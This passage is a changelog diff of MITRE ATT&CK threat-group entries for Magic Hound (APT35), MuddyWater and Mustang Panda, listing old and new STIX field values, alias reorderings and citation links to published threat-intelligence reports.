| external_references[16]['url'] | https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html | https://www.secureworks.com/research/threat-profiles/bronze-mohawk |
| Old Description | New Description |
|---|---|
| [Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted U.S. and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021) | [Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-04 13:12:54.646000+00:00 | 2022-06-03 13:20:02.945000+00:00 |
| description | [Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted U.S. and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021) | [Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021) |
| external_references[1]['source_name'] | Magic Hound | Charming Kitten |
| external_references[1]['description'] | (Citation: Unit 42 Magic Hound Feb 2017) | (Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022) |
| external_references[2]['source_name'] | TA453 | APT35 |
| external_references[2]['description'] | (Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021) | (Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022) |
| external_references[3]['source_name'] | COBALT ILLUSION | ITG18 |
| external_references[3]['description'] | (Citation: Secureworks COBALT ILLUSION Threat Profile) | (Citation: IBM ITG18 2020) |
| external_references[4]['source_name'] | Charming Kitten | Phosphorus |
| external_references[4]['description'] | (Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021) | (Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022) |
| external_references[5]['source_name'] | ITG18 | TA453 |
| external_references[5]['description'] | (Citation: IBM ITG18 2020) | (Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022) |
| external_references[6]['source_name'] | Phosphorus | COBALT ILLUSION |
| external_references[6]['description'] | (Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021) | (Citation: Secureworks COBALT ILLUSION Threat Profile) |
| external_references[7]['source_name'] | Newscaster | Magic Hound |
| external_references[7]['description'] | Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018) | (Citation: Unit 42 Magic Hound Feb 2017) |
| external_references[8]['source_name'] | APT35 | Microsoft Phosphorus Mar 2019 |
| external_references[8]['description'] | (Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021) | Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020. |
| external_references[9]['source_name'] | FireEye APT35 2018 | Microsoft Phosphorus Oct 2020 |
| external_references[9]['description'] | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. | Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021. |
| external_references[9]['url'] | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf | https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/ |
| external_references[10]['source_name'] | ClearSky Kittens Back 3 August 2020 | Certfa Charming Kitten January 2021 |
| external_references[10]['description'] | ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021. | Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021. |
| external_references[10]['url'] | https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf | https://blog.certfa.com/posts/charming-kitten-christmas-gift/ |
| external_references[11]['source_name'] | Certfa Charming Kitten January 2021 | Check Point APT35 CharmPower January 2022 |
| external_references[11]['description'] | Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021. | Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022. |
| external_references[11]['url'] | https://blog.certfa.com/posts/charming-kitten-christmas-gift/ | https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/ |
| external_references[12]['source_name'] | Secureworks COBALT ILLUSION Threat Profile | ClearSky Charming Kitten Dec 2017 |
| external_references[12]['description'] | Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021. | ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017. |
| external_references[12]['url'] | https://www.secureworks.com/research/threat-profiles/cobalt-illusion | http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf |
| external_references[13]['source_name'] | Proofpoint TA453 July2021 | ClearSky Kittens Back 2 Oct 2019 |
| external_references[13]['description'] | Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021. | ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021. |
| external_references[13]['url'] | https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453 | https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf |
| external_references[14]['source_name'] | Unit 42 Magic Hound Feb 2017 | ClearSky Kittens Back 3 August 2020 |
| external_references[14]['description'] | Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017. | ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021. |
| external_references[14]['url'] | https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/ | https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf |
| external_references[15]['source_name'] | Proofpoint TA453 March 2021 | Eweek Newscaster and Charming Kitten May 2014 |
| external_references[15]['description'] | Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021. | Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021. |
| external_references[15]['url'] | https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential | https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering |
| external_references[16]['source_name'] | ClearSky Charming Kitten Dec 2017 | Unit 42 Magic Hound Feb 2017 |
| external_references[16]['description'] | ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017. | Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017. |
| external_references[16]['url'] | http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf | https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/ |
| external_references[17]['source_name'] | Eweek Newscaster and Charming Kitten May 2014 | Newscaster |
| external_references[17]['description'] | Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021. | Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018) |
| external_references[18]['source_name'] | ClearSky Kittens Back 2 Oct 2019 | FireEye APT35 2018 |
| external_references[18]['description'] | ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021. | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. |
| external_references[18]['url'] | https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf |
| external_references[19]['source_name'] | IBM ITG18 2020 | Proofpoint TA453 July2021 |
| external_references[19]['description'] | Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021. | Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021. |
| external_references[19]['url'] | https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/ | https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453 |
| external_references[20]['source_name'] | Microsoft Phosphorus Mar 2019 | Proofpoint TA453 March 2021 |
| external_references[20]['description'] | Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020. | Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021. |
| external_references[20]['url'] | https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ | https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential |
| external_references[21]['source_name'] | Microsoft Phosphorus Oct 2020 | Secureworks COBALT ILLUSION Threat Profile |
| external_references[21]['description'] | Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021. | Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021. |
| external_references[21]['url'] | https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/ | https://www.secureworks.com/research/threat-profiles/cobalt-illusion |
| x_mitre_version | 4.0 | 5.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'IBM ITG18 2020', 'description': 'Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.', 'url': 'https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/'} | |
| x_mitre_contributors | Daniyal Naeem, BT Security |
| Old Description | New Description |
|---|---|
| [MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017) | [MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Ozer Sarilar, @ozersarilar, STM', 'Daniyal Naeem, BT Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 22:30:05.308000+00:00 | 2022-10-17 12:43:55.847000+00:00 |
| description | [MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017) | [MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022) |
| aliases[1] | Earth Vetala | Earth Vetala |
| external_references[1]['source_name'] | MuddyWater | MERCURY |
| external_references[1]['description'] | (Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018) | (Citation: Anomali Static Kitten February 2021) |
| external_references[2]['source_name'] | Earth Vetala | Static Kitten |
| external_references[2]['description'] | (Citation: Trend Micro Muddy Water March 2021) | (Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) |
| external_references[3]['source_name'] | MERCURY | TEMP.Zagros |
| external_references[3]['description'] | (Citation: Anomali Static Kitten February 2021) | (Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) |
| external_references[4]['source_name'] | Static Kitten | Seedworm |
| external_references[4]['description'] | (Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) | (Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) |
| external_references[5]['source_name'] | Seedworm | Earth Vetala |
| external_references[5]['description'] | (Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) | (Citation: Trend Micro Muddy Water March 2021) |
| external_references[6]['source_name'] | TEMP.Zagros | MuddyWater |
| external_references[6]['description'] | (Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) | (Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018) |
| external_references[7]['source_name'] | Unit 42 MuddyWater Nov 2017 | ClearSky MuddyWater Nov 2018 |
| external_references[7]['description'] | Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. | ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. |
| external_references[7]['url'] | https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ | https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf |
| external_references[8]['source_name'] | Symantec MuddyWater Dec 2018 | ClearSky MuddyWater June 2019 |
| external_references[8]['description'] | Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018. | ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020. |
| external_references[8]['url'] | https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group | https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf |
| external_references[9]['source_name'] | ClearSky MuddyWater Nov 2018 | CYBERCOM Iranian Intel Cyber January 2022 |
| external_references[9]['description'] | ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. | Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022. |
| external_references[9]['url'] | https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf | https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/ |
| external_references[10]['source_name'] | ClearSky MuddyWater June 2019 | DHS CISA AA22-055A MuddyWater February 2022 |
| external_references[10]['description'] | ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020. | FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022. |
| external_references[10]['url'] | https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf | https://www.cisa.gov/uscert/ncas/alerts/aa22-055a |
| external_references[11]['source_name'] | Reaqta MuddyWater November 2017 | Unit 42 MuddyWater Nov 2017 |
| external_references[11]['description'] | Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020. | Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. |
| external_references[11]['url'] | https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/ | https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ |
| external_references[12]['source_name'] | Trend Micro Muddy Water March 2021 | Talos MuddyWater Jan 2022 |
| external_references[12]['description'] | Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. | Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022. |
| external_references[12]['url'] | https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html | https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html |
| external_references[14]['source_name'] | FireEye MuddyWater Mar 2018 | Trend Micro Muddy Water March 2021 |
| external_references[14]['description'] | Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018. | Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. |
| external_references[14]['url'] | https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html | https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html |
| x_mitre_version | 3.0 | 4.0 |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Reaqta MuddyWater November 2017', 'description': 'Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.', 'url': 'https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/'} | |
| external_references | {'source_name': 'FireEye MuddyWater Mar 2018', 'description': 'Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html'} | |
| external_references | {'source_name': 'Symantec MuddyWater Dec 2018', 'description': 'Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.', 'url': 'https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group'} | |

| Old Description | New Description |
|---|---|
| [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Germany, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) | [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 21:11:44.216000+00:00 | 2022-04-11 16:43:52.231000+00:00 |
| description | [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Germany, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) | [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) |
| external_references[3]['description'] | (Citation: Recorded Future REDDELTA July 2020) | (Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022) |
| external_references[5]['source_name'] | Crowdstrike MUSTANG PANDA June 2018 | Anomali MUSTANG PANDA October 2019 |
| external_references[5]['description'] | Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021. | Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. |
| external_references[5]['url'] | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ | https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations |
| external_references[6]['source_name'] | Anomali MUSTANG PANDA October 2019 | Secureworks BRONZE PRESIDENT December 2019 |
| external_references[6]['description'] | Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. | Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. |
| external_references[6]['url'] | https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations | https://www.secureworks.com/research/bronze-president-targets-ngos |
| external_references[7]['source_name'] | Secureworks BRONZE PRESIDENT December 2019 | Recorded Future REDDELTA July 2020 |
| external_references[7]['description'] | Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. | Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021. |
| external_references[7]['url'] | https://www.secureworks.com/research/bronze-president-targets-ngos | https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf |
| external_references[8]['source_name'] | Proofpoint TA416 November 2020 | Crowdstrike MUSTANG PANDA June 2018 |
| external_references[8]['description'] | Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021. | Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021. |
| external_references[8]['url'] | https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ |
| external_references[9]['source_name'] | Recorded Future REDDELTA July 2020 | Proofpoint TA416 November 2020 |
| external_references[9]['description'] | Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021. | Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021. |
| external_references[9]['url'] | https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf | https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader |
| x_mitre_version | 1.1 | 2.0 |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Proofpoint TA416 Europe March 2022', 'description': 'Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european'} | |

| Old Description | New Description |
|---|---|
